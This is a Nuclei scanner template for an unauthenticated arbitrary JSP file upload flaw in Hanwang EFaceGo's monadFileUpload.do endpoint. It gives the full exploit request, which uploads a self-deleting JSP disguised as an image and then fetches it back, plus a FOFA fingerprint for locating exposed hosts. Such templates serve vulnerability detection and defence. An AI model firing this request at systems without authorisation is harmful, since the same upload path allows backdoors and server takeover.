http:
    - extractors:
        - group: 1
          internal: true
          name: uploadfile
          part: body
          regex:
            - (\b\d{4}-\d{1,2}-\d{1,2}\b\/[a-zA-Z0-9-]+\.jsp)
          type: regex
      raw:
        - |
          POST /manage/leaveList/monadFileUpload.do?recoToken=67mds2pxXQb&type= HTTP/1.1
          Host: {{Hostname}}
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
          Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFfJZ4PlAZBixjELj

          ------WebKitFormBoundaryFfJZ4PlAZBixjELj
          Content-Disposition: form-data; name="file"; filename="{{username}}.jsp"
          Content-Type: image/jpeg

          <% out.println("pboyjnnrfipmplsukdeczudsefxmywe"); new java.io.File(application.getRealPath(request.getServletPath())).delete(); %>
          ------WebKitFormBoundaryFfJZ4PlAZBixjELj--
    - matchers:
        - part: body
          type: word
          words:
            - pboyjnnrfipmplsukdeczudsefxmywe
        - status:
            - 200
          type: status
      matchers-condition: and
      raw:
        - |
          GET /manage/resource/{{uploadfile}} HTTP/1.1
          Host: {{Hostname}}
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
id: hanwangEFaceGo-monadFileUpload_do-File-upload
info:
    author: Superhero
    description: |-
        fofa: icon_hash="1380907357"
        汉王EFaceGo monadFileUpload.do 接口存在文件上传漏洞，未经身份攻击者可通过该漏洞在服务器端任意执行代码，写入后门，获取服务器权限，进而控制整个 web 服务器。
    name: 汉王EFaceGo monadFileUpload.do 任意文件上传漏洞
    reference:
        - https://mp.weixin.qq.com/s/kj-DE7ptBPWzu1c6j5i4Yw
    severity: high
    tags:
        - Servlet
variables:
    username: '{{to_lower(rand_base(6))}}'
